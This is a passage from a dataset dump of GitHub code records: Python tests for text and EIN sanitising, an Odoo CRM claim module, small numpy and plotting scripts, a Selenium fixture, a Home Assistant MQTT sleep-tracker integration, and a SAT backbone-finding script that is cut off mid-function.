\"el-ni%C3%B1o\"),\n (\"I'm a little \\\"teapot\\\", 'short' & stout.\", \"im-a-little-teapot-short-and-stout\"),\n (\"#yolo\", \"yolo\"),\n (\"Everyone was rude; Paris vacation\", \"everyone-was-rude-paris-vacation\"),\n (\"Mission: Impossible\", \"mission-impossible\"),\n (\"snake_case\", \"snake-case\"),\n (\"Either/or\", \"either-or\"),\n (\"(parenthesized)\", \"parenthesized\"),\n (\".net\", \"net\")\n])\ndef test_sanitize_text(original: str, expected: str) -> None:\n actual: str = Text.sanitize(original)\n assert actual == expected\n\n@pytest.mark.parametrize(\"original, expected\", [\n (\"012345678\", \"012345678\"),\n (\"01-2345678\", \"012345678\"),\n (\" 012345678 \", \"012345678\"),\n (\" -0-1-2-3-4-5-6-7-8- \", \"012345678\"),\n (\"abcdefghi\", \"abcdefghi\"),\n (\"abcdefghi\", \"abcdefghi\"),\n (\"12345678\", \"012345678\"),\n (\"bcdefghi\", \"bcdefghi\"),\n (\"00000008\", \"000000008\"),\n (\"8\", \"8\"),\n])\ndef test_sanitize_ein(original: str, expected: str) -> None:\n actual: str = EIN.sanitize(original)\n assert actual == expected\n\n@pytest.mark.parametrize(\"original, expected\", [\n (\"012345678\", \"01-2345678\"),\n (\"01-2345678\", \"01-2345678\"),\n (\" 012345678 \", \"01-2345678\"),\n (\" -0-1-2-3-4-5-6-7-8- \", \"01-2345678\"),\n (\"abcdefghi\", \"\"),\n (\"abcdefghi\", \"\"),\n (\"12345678\", \"01-2345678\"),\n (\"bcdefghi\", \"\"),\n (\"00000008\", \"00-0000008\"),\n (\"8\", \"\"),\n])\ndef test_display_format_ein(original: str, expected: str) -> None:\n actual: str = EIN.display_format(original)\n assert actual == expected\n","repo_name":"borenstein/polytropos","sub_path":"test/test_unit/ontology/variable/test_sanitize.py","file_name":"test_sanitize.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"4359544402","text":"from openerp.osv import osv, fields\nimport logging\n_logger = logging.getLogger(__name__)\nfrom openerp.tools.translate import _\n\n\nclass sale_crm_lead(osv.Model):\n _inherit = 'crm.lead'\n\n def create(self, cr, uid, vals, context=None):\n res = super(sale_crm_lead, self).create(cr, uid, vals, context=context)\n lead = self.browse(cr, uid, res)\n #Issue139\n ir_model_data = self.pool.get('ir.model.data')\n if lead.user_id and lead.user_id.email:\n try:\n template_id = ir_model_data.get_object_reference(cr, uid, 'crm_claim_enhance', 'email_template_crm_lead_notify')[1]\n if template_id:\n template_obj = self.pool.get('email.template')\n mail_id = template_obj.send_mail(cr, uid, template_id, res, True)\n except ValueError:\n template_id = False\n return res\n\nsale_crm_lead()\n\nclass crm_claim(osv.Model):\n _inherit = 'crm.claim'\n\n def _parts_cost(self, cursor, user, ids, name, arg, context=None):\n res = {}\n for claim in self.browse(cursor, user, ids, context=context):\n res[claim.id] = 0\n for pro in claim.parts_code:\n res[claim.id] += pro.standard_price;\n return res\n\n '''\n def _qc_manager(self, cursor, user, ids, name, arg, context=None):\n res = {}\n for claim in self.browse(cursor, user, ids, context=context):\n res[claim.id] = 'null'\n if claim.type == 'Warranty' and claim.sale_id:\n qc_manager_ids = []\n for line in claim.sale_id.order_line:\n if line.product_id.qc_manager:\n qc_manager_ids.append(str(line.product_id.qc_manager.id))\n res[claim.id] = ','.join(set(qc_manager_ids))\n return res\n '''\n\n _columns = {\n #Issue256\n 'parts_code':fields.many2many('product.product', 'claim_partproduct','claim_id','product_id',string='Parts Code'),\n 'parts_cost': fields.function(\n _parts_cost,\n string='Parts Cost',\n type='float',\n #store=True\n ),\n 'fixing_cost': fields.float('Fixing Cost'),\n 'fixing_cost_desc': fields.text('Fixing Cost Description'),\n 'reso_actions': fields.selection((\n ('partial refund','Partial Refund'), \n ('full refund','Full Refund'), \n ('replacement','Replacement'), \n ('repair','Repair')),'Resolution actions'),\n# 'qc_manager': fields.function(\n# _qc_manager,\n# string='QC Manager',\n# type='char',\n# size=128,\n# ),\n 'warranty_id': fields.char('Warranty ID#', size=32),\n #Issue279\n 'product_purchase_ids':fields.many2many('product.product', 'claim_product_purchase','claim_id','product_id',string='Product Purchase'),\n 'department_ids': fields.many2many('hr.department', 'claim_department', 'claim_id', 'department_id', string='Root Responsible Department'), #Issue 287\n 'resp_ids': fields.many2many('hr.employee', 'claim_employee', 'claim_id', 'employee_id',string='Root Responsible Person'), #Issue 287\n 'pre_action': fields.text('Prevention Action'), #Issue287\n 'co_action': fields.text('Correction Action'), #Issue287\n 'if_final': fields.boolean('If Final Settled'),#Issue287\n 'youtube_url':fields.char('YouTube URL', size=128),#Issue321\n 'youtube_url_fd':fields.char('YouTube URL', size=128),#Issue321\n 'youtube_url_wc':fields.char('YouTube URL', size=128),#Issue321\n }\n\n #Issue340\n def name_get(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n if isinstance(ids, (int, long)):\n ids = [ids]\n res = []\n for record in self.browse(cr, uid, ids, context=context):\n name = str(record.number) + '-' + str(record.name)\n if record.sale_id:\n name += '-' + str(record.sale_id.name)\n if record.partner_id:\n name += '-' + str(record.partner_id.name)\n res.append((record.id, name))\n return res\n\n\n def write(self, cr, uid, ids, vals, context=None):\n #Issue 287\n if ('department_ids' in vals or 'resp_ids' in vals) and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"):\n raise osv.except_osv(_('Error!'), _('The Root Responsible Person and Root Responsible Department must be modified by Sales Manager!'))\n\n for claim in self.browse(cr, uid, ids, context=context):\n users = []\n new_em_emails = []\n if 'resp_ids' in vals:\n old = claim.resp_ids and [d.id for d in claim.resp_ids] or []\n new = vals.get('resp_ids') and vals.get('resp_ids')[0][-1] or []\n for employee in new:\n em = self.pool.get('hr.employee').browse(cr, uid, employee)\n if em.user_id:\n users.append(em.user_id.id)\n ans = set(new) - set(old)\n for employee in ans:\n em = self.pool.get('hr.employee').browse(cr, uid, employee)\n if em.work_email:\n new_em_emails.append(str(em.work_email))\n else:\n for em in claim.resp_ids:\n if em.user_id:\n users.append(em.user_id.id)\n #_logger.info('vals ---- %s users %s new_em_emails %s',vals,users,new_em_emails)\n\n if ((users and uid not in users) and (not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"))) and ('department_ids' in vals or 'resp_ids' in vals or 'cause' in vals):\n raise osv.except_osv(_('Error!'), _('The Root must be modified by Root Responsible Person or Sales Manager!'))\n # The sale manager can modify department_ids,resp_ids.\n if new_em_emails:\n try:\n ir_model_data = self.pool.get('ir.model.data')\n template_id = ir_model_data.get_object_reference(cr, uid, 'crm_claim_enhance', 'email_template_crm_claim_responsible')[1]\n if template_id:\n template_obj = self.pool.get('email.template')\n template_obj.write(cr, uid, [template_id], {'email_to': ','.join(new_em_emails)})\n template_obj.send_mail(cr, uid, template_id, claim.id, True)\n except ValueError:\n template_id = False\n\n return super(crm_claim, self).write(cr, uid, ids, vals, context=context)\n\n\n #Issue 286\n def action_create_refund_invoice(self, cr, uid, ids, context=None):\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_enhance', 'invoice_form_inh_cus')\n claim_obj = self.browse(cr, uid, ids[0])\n return {\n 'name': \"Create\",\n 'view_mode': 'form',\n 'view_id': view_id,\n #'res_id': order_id,\n 'view_type': 'form',\n 'res_model': 'account.invoice',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n #'target': 'new',\n 'domain': '[]',\n 'context': {\n \"default_type\": \"out_refund\",\n \"journal_type\": \"sale_refund\",\n \"claim_id\": ids and ids[0],\n \"partner_id\": claim_obj.partner_id.id,\n \"origin\": claim_obj.number +'+' + claim_obj.sale_id.name,\n \"name\": claim_obj.number +'+' + claim_obj.sale_id.name,\n },\n }\n\n def action_create_order(self, cr, uid, ids, context=None):\n sale_obj = self.pool.get(\"sale.order\")\n line_obj = self.pool.get(\"sale.order.line\")\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')\n for claim in self.browse(cr ,uid, ids, context=context):\n so_name = self.pool.get('ir.sequence').get(cr, uid, 'sale.order', context=context)\n order_id = sale_obj.create(cr ,uid, {\n 'name': so_name,\n 'partner_id': claim.partner_id.id,\n 'origin': claim.name,\n 'partner_invoice_id': claim.partner_id.id,\n 'partner_shipping_id': claim.partner_id.id,\n 'pricelist_id': claim.partner_id.property_product_pricelist and claim.partner_id.property_product_pricelist.id or False\n }, context=context)\n for product_id in claim.parts_code:\n line_vals = {\n 'order_id': order_id,\n 'name': product_id.name,\n 'product_id': product_id.id,\n 'price_unit': product_id.list_price,\n 'product_uom_qty': 1,\n 'product_uom': product_id.uom_id.id,\n }\n line_obj.create(cr, uid, line_vals, context=context)\n #return osv.except_osv(_('Info!'), _('%s created successfully!'%so_name))\n return {\n 'name': \"Create Success\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'res_id': order_id,\n 'view_type': 'form',\n 'res_model': 'sale.order',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n #'target': 'new',\n 'domain': '[]',\n 'context': {},\n }\n\n\n #Issue 287\n def case_close(self, cr, uid, ids, context=None):\n result = super(crm_claim, self).case_close(cr, uid, ids, context)\n for claim in self.browse(cr ,uid, ids, context=context):\n if not claim.co_action:\n raise osv.except_osv(_('Missing Data'),_('Please Fill Customer Service Resolutions'))\n\n #CRM - Channel OP Team\n crm = []\n for em in self.pool.get('res.users').browse(cr, uid, uid).employee_ids:\n if em.department_id.id == 16 or (em.department_id.name and em.department_id.name.upper().startswith('CRM')):\n crm.append(em.user_id.id)\n\n if uid != claim.user_id.id and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\") and uid not in crm:\n raise osv.except_osv(_('Error!'), _('This claim must be comfired by Responsible or Sale Manager or Employee(CRM - Channel OP Team)!'))\n #raise osv.except_osv(_('Error!'), _('This claim must be comfired by QC manager!'))\n #Final Settle\n if claim.if_final:\n self.write(cr, uid, [claim.id], {'stage_id':12})\n return result\n\n #Issue287\n def case_close_final(self, cr, uid, ids, context=None):\n for claim in self.browse(cr ,uid, ids, context=context):\n if not claim.department_ids or not claim.resp_ids or not claim.cause:\n raise osv.except_osv(_('Error!'), _('The Root Responsible Department and Root Responsible Person and Root Causes can not be NULL!'))\n users = []\n for em in claim.resp_ids:\n if em.user_id:\n users.append(em.user_id.id)\n if (users and uid not in users) and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"):\n raise osv.except_osv(_('Error!'), _('This claim must be comfired by Responsible or Sale Manager!'))\n self.write(cr, uid, [claim.id], {'if_final':True})\n #Final Settle\n if claim.state == 'done':\n self.write(cr, uid, [claim.id], {'stage_id':12})\n return True\n\n '''\n def action_comfirm_byqc(self, cr, uid, ids, context=None):\n context = context or {}\n for claim in self.browse(cr ,uid, ids, context=context):\n if claim.qc_manager and str(uid) not in claim.qc_manager:\n raise osv.except_osv(_('Error!'), _('You have not right to confirm this claim!'))\n else:\n context.update({\"force_close\":True})\n return self.case_close(cr, uid, [claim.id], context=context)\n return\n '''\n\n #Issue328\n def create(self, cr, uid, vals, context=None):\n res = super(crm_claim, self).create(cr, uid, vals, context=context)\n claim = self.browse(cr, uid, res)\n email_to = list(set([product.supplier_resp and product.supplier_resp.email for product in claim.product_purchase_ids] + [product.qc_manager and product.qc_manager.partner_id.email for product in claim.product_purchase_ids]))#Issue356 \n email_to = list(set(filter(lambda x: x,email_to)))\n \n if email_to:\n template = self.pool.get('ir.model.data').get_object(cr, uid, 'crm_claim_mactrends', 'email_template_claim')\n template_obj = self.pool.get('email.template')\n old_email_to = template_obj.browse(cr, uid, template.id).email_to\n template_obj.write(cr, uid, [template.id], {'email_to':','.join(email_to)})\n mail_id = template_obj.send_mail(cr, uid, template.id, claim.id, True)\n if old_email_to:\n template_obj.write(cr, uid, [template.id], {'email_to':old_email_to})\n return res\n\n #Issue349\n def action_create_refund_picking(self, cr, uid, ids, context=None):\n cr.execute(\"select id from stock_picking where sale_id in (select sale_id from crm_claim where id= %s) and type='in'\"%ids[0])\n pickings = cr.fetchall()\n #_logger.info('pp------ %s',pickings)\n if pickings:\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock_enhance', 'view_picking_in_form_inh')\n result = {\n 'name': \"Exist!\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'stock.picking.in',\n 'res_id': pickings[0][0],\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'domain': '[]',\n 'context': {\n \"type\": \"in\",\n \"claim_id\": ids and ids[0]\n }}\n return result\n\n cr.execute(\"select id from stock_picking where sale_id in (select sale_id from crm_claim where id= %s) and type='out'\"%ids[0])\n pickings = cr.fetchall()\n if pickings:\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'view_stock_return_picking_form')\n result = {\n 'name': \"Create\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'stock.return.picking',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': \"new\",\n 'domain': '[]',\n 'context': {\n \"type\": \"in\",\n \"active_id\":pickings[0][0],\n \"claim_id\": ids and ids[0]\n },}\n return result\n\ncrm_claim()\n","repo_name":"haitunzzz/ODOO","sub_path":"crm_claim_enhance/crm_claim.py","file_name":"crm_claim.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14944557253","text":"def handle_list_of_tuples(tuples_list):\n \"\"\"The function that takes list of tuples and sort it\n based on the 'name/age/height/weight' rule.\n Also we need to sort height in reverse order.\n :param tuples_list: list of tuples\n :return: sorted list of tuples by required rule\n \"\"\"\n return sorted(tuples_list, key=lambda item: (\n item[0],\n item[1],\n -int(item[2]), # Here, our goal is to reverse sort by height\n item[3]\n ))\n\n\ndef main():\n items_list = [\n (\"Tom\", \"19\", \"167\", \"54\"),\n (\"Jony\", \"24\", \"180\", \"69\"),\n (\"Json\", \"21\", \"185\", \"75\"),\n (\"John\", \"27\", \"190\", \"87\"),\n (\"Jony\", \"24\", \"191\", \"98\"),\n ]\n print(handle_list_of_tuples(items_list))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YuriiKhomych/db2-python-django","sub_path":"tasks/3_handle_list_of_tuples.py","file_name":"3_handle_list_of_tuples.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22862012686","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n# Data set\nA = [2,5,7,9,11,16,19,23,22,29,29,35,37,40,46]\nb = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\nplt.plot(A,b,'ro')\n\n# Convert row vector to column vector\nA = np.array([A]).T\nb = np.array([b]).T\n\n# Create ones vector\nones = np.ones((A.shape[0], 1), dtype=np.int8)\n\n# Concatenate ones to A\nA = np.concatenate((A,ones), axis=1)\n\n# Apply linear regression formula\nresult = np.linalg.inv(A.T.dot(A)).dot(A.T.dot(b))\n\n# Visualize result\nx0 = np.array([1,50]).T\ny0 = result[0][0] * x0 + result[1][0]\nplt.plot(x0,y0)\n\nplt.show()\n","repo_name":"nguyengiahy/Machine-Learning-Algorithms-Visualizer","sub_path":"Linear-Regression-Visualizer/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18390947550","text":"from figures import *\nfrom defaults import*\n\nwidth = standardwidth\nheight = standardheight\nbeginfigure(\"1_5_PPprimeplot\", 2*width, height)\n\nsave()\nmargin = 10\nsetupcoordinates([margin,margin,width-2*margin,height-2*margin], \n [-10, -50, 90, 450])\n\nxrange = [-10, 10, 90]\nyrange = [-50, 50, 450]\n\ngrid = Grid(xrange, yrange, color = gridcolor)\ngrid.setlinewidth(gridwidth)\ngrid.draw()\n\naxes = Axes()\naxes.draw()\n\naxes.setticks(xrange, yrange)\naxes.drawticks()\n\naxes.sethticksize(sizeofaxesticks)\naxes.setvticksize(sizeofaxesticks)\n\naxes.setlabels([0,20,80],[0,100,400])\naxes.sethlabelscale(scaleofaxeslabels)\naxes.setvlabelscale(scaleofaxeslabels)\naxes.drawlabels()\n\nlabel = Label(r\"$y = P(t)$\", [10,350], alignment = \"lt\", offset = [0, -2] )\nlabel.draw()\n\nlabel = Label(r\"$^\\circ$F\", [5,410], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\nlabel = Label(r\"min\", [80,20], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\n\n############# original function graph\n\ndef f(x):\n return 400-330*math.exp(-0.03*x)\n\ncliptoboundingbox() \ngraph = Graph(Function(f))\ngraph.setcolor(graphcolor)\ngraph.setdomain([0,90])\ngraph.setlinewidth(graphwidth)\ngraph.draw()\n\nrestore()\n\n############## now the derivative function graph\n\nsave()\nmargin = 10\n\nsetupcoordinates([width+2*margin,margin,2*width-2*margin,height-2*margin], \n [-10, -2, 90, 18])\n\nxrange = [-10, 10, 90]\nyrange = [-2, 2, 18]\n\ngrid = Grid(xrange, yrange, color = gridcolor)\ngrid.setlinewidth(gridwidth)\ngrid.draw()\n\naxes = Axes()\naxes.draw()\n\naxes.setticks(xrange, yrange)\naxes.drawticks()\n\naxes.sethticksize(sizeofaxesticks)\naxes.setvticksize(sizeofaxesticks)\n\naxes.setlabels([0,20,80], [0,4,16])\naxes.sethlabelscale(scaleofaxeslabels)\naxes.setvlabelscale(scaleofaxeslabels)\naxes.drawlabels()\n\nlabel = Label(r\"$y = P'(t)$\", [10,10], alignment = \"lt\", offset = [2, -2] )\nlabel.draw()\n\nlabel = Label(r\"$^\\circ$F/min\", [5,16], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\nlabel = Label(r\"min\", [80,1], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\ndef f(x):\n return 400-330*math.exp(-0.03*x)\n\nderivative = Function(f).differentiate()\ngraph = Graph(derivative, color=darkgreen)\ngraph.setdomain([0,90])\ngraph.draw()\n\nrestore()\n\nendfigure()\n","repo_name":"ArmstrongCal/Armstrong-Calculus","sub_path":"figures/1_5_PPprimeplot.py","file_name":"1_5_PPprimeplot.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2706098239","text":"import platform\nimport os\nimport pytest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass DriverSetup:\n\n @pytest.yield_fixture(autouse=True)\n def init_browser(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--ignore-ssl-errors')\n options.add_argument('start-maximized')\n if platform.system() == \"Darwin\":\n dir_path = os.path.dirname(os.path.realpath(__file__))\n chromedriver = dir_path + \"/webdrivers/chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n self.driver = webdriver.Chrome(options=options, executable_path=chromedriver)\n else:\n self.driver = webdriver.Chrome(options=options, executable_path=ChromeDriverManager().install())\n self.driver.implicitly_wait(10)\n yield\n if (self.driver != None):\n self.driver.close()\n self.driver.quit()\n","repo_name":"eschelkunov/AQA_Python","sub_path":"ui/DriverSetup.py","file_name":"DriverSetup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11482053813","text":"# 在这里写上你的代码 :-)\n'''\n题目078:找到年龄最大的人,并输出。\nperson = {\"li\":18,\"wang\":50,\"zhang\":20,\"sun\":22}\n'''\ndef tm078():\n '''\n 【个人备注】:官网的答案也基本一样。\n '''\n person = {\"li\":18,\"wang\":50,\"zhang\":20,\"sun\":22}\n name,age='',0\n for p in person.keys():\n if person.get(p)>age:\n name,age=p,person.get(p)\n print(name,age)\n\ntm078()\n","repo_name":"xiang-daode/Python3_codes","sub_path":"T078_字典中找到年龄最大的人.py","file_name":"T078_字典中找到年龄最大的人.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17149846111","text":"\"\"\"Sleep As Android integration\"\"\"\n\nimport logging\nfrom typing import Dict, Callable\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers import entity_registry as er\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.components.mqtt import subscription\nfrom homeassistant.exceptions import NoEntitySpecifiedError\n\nfrom .const import DOMAIN, DEVICE_MACRO\nfrom .sensor import SleepAsAndroidSensor\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup(_hass: HomeAssistant, _config_entry: ConfigEntry):\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry):\n _LOGGER.info(\"Setting up %s \", config_entry.entry_id)\n\n if DOMAIN not in hass.data:\n hass.data[DOMAIN] = {}\n\n registry = await er.async_get_registry(hass)\n hass.data[DOMAIN][config_entry.entry_id] = SleepAsAndroidInstance(hass, config_entry, registry)\n return True\n\n\nclass SleepAsAndroidInstance:\n def __init__(self, hass: HomeAssistant, config_entry: ConfigEntry, registry: er):\n self.hass = hass\n self._config_entry = config_entry\n self.__sensors: Dict[str, SleepAsAndroidSensor] = {}\n self._entity_registry: er = registry\n self._subscription_state = None\n\n try:\n self._name: str = self.get_from_config('name')\n except KeyError:\n self._name = 'SleepAsAndroid'\n\n # will call async_setup_entry from sensor.py\n self.hass.loop.create_task(self.hass.config_entries.async_forward_entry_setup(self._config_entry, 'sensor'))\n # ToDo prepare topic_template and other variables that should be defined one time.\n\n @property\n def device_position_in_topic(self) -> int:\n \"\"\" Position of DEVICE_MACRO in configured MQTT topic \"\"\"\n result: int = 0\n\n for p in self.configured_topic.split('/'):\n if p == DEVICE_MACRO:\n break\n else:\n result += 1\n\n return result\n\n @staticmethod\n def device_name_from_topic_and_position(topic: str, position: int) -> str:\n \"\"\"\n Get device name from full topic.\n :param topic: full topic from MQTT message\n :param position: position of device template\n\n :returns: device name\n \"\"\"\n result: str = \"unknown_device\"\n s = topic.split('/')\n if position >= len(s):\n # If we have no DEVICE_MACRO in configured_topic,\n # then device_position_in_topic is greater than topic length and we should use\n # last segment of topic as device name\n position = len(s) - 1\n\n return s[position]\n\n def device_name_from_topic(self, topic: str) -> str:\n \"\"\"Get device name from topic\n\n :param topic: topic sting from MQTT message\n :returns: device name\n \"\"\"\n return self.device_name_from_topic_and_position(topic, self.device_position_in_topic)\n\n @property\n def topic_template(self) -> str:\n \"\"\"\n Converts topic with {device} to MQTT topic for subscribing\n \"\"\"\n splitted = self.configured_topic.split('/')\n try:\n splitted[self.device_position_in_topic] = '+'\n except IndexError:\n # If we have no DEVICE_MACRO in configured_topic,\n # then device_position_in_topic is greater than topic length\n pass\n return '/'.join(splitted)\n\n def get_from_config(self, name: str) -> str:\n try:\n data = self._config_entry.options[name]\n except KeyError:\n data = self._config_entry.data[name]\n\n return data\n\n @property\n def name(self) -> str:\n \"\"\"Name of the integration in Home Assistant.\"\"\"\n return self._name\n\n @property\n def configured_topic(self) -> str:\n \"\"\"MQTT topic from integration configuration.\"\"\"\n _topic = None\n\n try:\n _topic = self.get_from_config('topic_template')\n except KeyError:\n _topic = 'SleepAsAndroid/' + DEVICE_MACRO\n _LOGGER.warning(\"Could not find topic_template in configuration. Will use %s instead\", _topic)\n\n return _topic\n\n def create_entity_id(self, device_name: str) -> str:\n \"\"\"\n Generates entity_id based on instance name and device name.\n Used to identify individual sensors.\n\n :param device_name: name of device\n :returns: id that may be used for searching sensor by entity_id in entity_registry\n \"\"\"\n _LOGGER.debug(f\"create_entity_id: my name is {self.name}, device name is {device_name}\")\n return self.name + \"_\" + device_name\n\n def device_name_from_entity_id(self, entity_id: str) -> str:\n \"\"\"\n Extract device name from entity_id\n\n :param entity_id: entity id that was generated by self.create_entity_id\n :returns: pure device name\n \"\"\"\n _LOGGER.debug(f\"device_name_from_entity_id: entity_id='{entity_id}'\")\n return entity_id.replace(self.name + \"_\", \"\", 1)\n\n @property\n def entity_registry(self) -> er:\n return self._entity_registry\n\n async def subscribe_root_topic(self, async_add_entities: Callable):\n \"\"\"(Re)Subscribe to topics.\"\"\"\n _LOGGER.debug(\"Subscribing to '%s' (generated from '%s')\", self.topic_template, self.configured_topic)\n self._subscription_state = None\n\n @callback\n def message_received(msg):\n \"\"\"Handle new MQTT messages.\"\"\"\n\n _LOGGER.debug(\"Got message %s\", msg)\n device_name = self.device_name_from_topic(msg.topic)\n entity_id = self.create_entity_id(device_name)\n _LOGGER.debug(f\"sensor entity_id is {entity_id}\")\n\n (target_sensor, is_new) = self.get_sensor(device_name)\n if is_new:\n async_add_entities([target_sensor], True)\n try:\n target_sensor.process_message(msg)\n except NoEntitySpecifiedError:\n # ToDo: async_write_ha_state() runs before async_add_entities, so entity have no entity_id yet\n pass\n\n self._subscription_state = await subscription.async_subscribe_topics(\n self.hass,\n self._subscription_state,\n {\n \"state_topic\": {\n \"topic\": self.topic_template,\n \"msg_callback\": message_received,\n \"qos\": self._config_entry.data['qos']\n }\n }\n )\n if self._subscription_state is not None:\n _LOGGER.debug(\"Subscribing to root topic is done!\")\n else:\n _LOGGER.critical(f\"Could not subscribe to topic {self.topic_template}\")\n\n def get_sensor(self, sensor_name: str) -> (SleepAsAndroidSensor, bool):\n \"\"\"\n Get sensor by it's name. If we have no such key in __sensors -- create new sensor\n :param sensor_name: name of sensor\n :return: (sensor with name \"sensor_name\", it it a new sensor)\n\n \"\"\"\n try:\n return self.__sensors[sensor_name], False\n except KeyError:\n _LOGGER.info(\"New device! Let's create sensor for %s\", sensor_name)\n new_sensor = SleepAsAndroidSensor(self.hass, self._config_entry, sensor_name)\n self.__sensors[sensor_name] = new_sensor\n return new_sensor, True\n","repo_name":"jabastien/Home-AssistantConfig","sub_path":"custom_components/sleep_as_android/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71246330728","text":"# computes the backbone of a DIMACS file (+ and - mark core and dead variables, respectively)\n# (C) 2020 Jaroslav Šafář (https://github.com/jaras209/SAT_solver/blob/master/backbones.py)\n# (C) 2023 Elias Kuiter\n# adapted to rely on the performant SAT solver kissat_MAB-HyWalk (winner of the SAT Competition 2022)\n# added several performance optimizations for analyzing large formulas\n# also added functionality to remove backbone from DIMACS\n# could be replaced with https://github.com/arminbiere/cadiback, which is more efficient\n\nimport sys\nimport heapq\nimport subprocess\nimport shutil\nimport os\nimport tempfile\nimport argparse\nimport itertools\n\nworking_directory = '/'.join(sys.argv[0].split('/')[:-1])\n\ndef flatten(iterable):\n iterator = iter(iterable)\n try:\n while 1:\n item = next(iterator)\n if not hasattr(item,'__trunc__'):\n iterator = itertools.chain(iter(item), iterator)\n else:\n yield item\n except StopIteration:\n pass\n\ndef read_variable_map(file, by_name=False):\n f = open(file, mode=\"r\")\n dimacs_formula = f.read()\n dimacs_formula = dimacs_formula.splitlines()\n variable_map = {}\n for s in dimacs_formula:\n if s.startswith('c '):\n parts = s[2:].strip().split()\n if by_name:\n variable_map[parts[1]] = int(parts[0])\n else:\n variable_map[int(parts[0])] = parts[1]\n f.close()\n return variable_map\n\ndef read_dimacs(file):\n global variables\n f = open(file, mode=\"r\")\n dimacs_formula = f.read()\n dimacs_formula = dimacs_formula.splitlines()\n formula = [list(map(int, clause[:-2].strip().split())) for clause in dimacs_formula if clause != \"\" and\n clause[0] not in [\"c\", \"p\", \"%\", \"0\"]]\n variables = [(s.split()[2]) for s in dimacs_formula if s.startswith('p ')][0]\n f.close()\n return formula\n\ndef write_dimacs(file, formula, variable_map=None):\n global variables\n f = open(file, \"w+\")\n if variable_map:\n for index, variable in variable_map.items():\n f.write(f'c {index} {variable}\\n')\n f.write(f'p cnf {variables} {len(formula)}\\n')\n for c in formula:\n f.write(' '.join(map(str, c)) + ' 0\\n')\n f.close()\n\ndef append_dimacs(from_file, to_file, literal):\n global variables\n from_file = open(from_file, mode=\"r\")\n to_file = open(to_file, mode=\"w+\")\n literals = int(from_file.readline().split()[3])\n to_file.write(f'p cnf {variables} {literals + 1}\\n')\n shutil.copyfileobj(from_file, to_file)\n to_file.write(f'{literal} 0\\n')\n from_file.close()\n to_file.close()\n\ndef shell(command):\n return subprocess.run(command, capture_output=True, text=True).stdout.split('\\n')\n\ndef kissat(file):\n model = list(flatten([list(map(int, s[2:].strip().split())) for s in shell([f'{working_directory}/kissat_MAB-HyWalk', file]) if s.startswith('v ')]))\n return len(model) > 0, model\n\ndef delete(file):\n os.remove(file) if os.path.exists(file) else None\n\ndef find_backbone(file):\n with tempfile.TemporaryDirectory() as temp_directory:\n def temp_file(file):\n return f'{temp_directory}/{file}.dimacs'\n formula_file = temp_file('formula')\n assumed_file = temp_file('assumed')\n inferred_file = temp_file('inferred')\n \n formula = read_dimacs(file)\n write_dimacs(formula_file, formula)\n sat, model = kissat(formula_file)\n if not sat:\n return None, None\n\n occurrences = {}\n for clause in formula:\n for literal in clause:\n occurrences.setdefault(literal, 0)\n occurrences[literal] += 1\n\n def compare(self, a, b):\n return a[0] < b[0]\n heapq.cmp_lt=compare\n candidates = []\n for literal in model:\n heapq.heappush(candidates, [-occurrences.get(literal, 0), literal])\n\n backbone = []\n while candidates:\n _, literal = heapq.heappop(candidates)\n if literal == 0:\n continue\n append_dimacs(formula_file, assumed_file, -literal)\n sat, model = 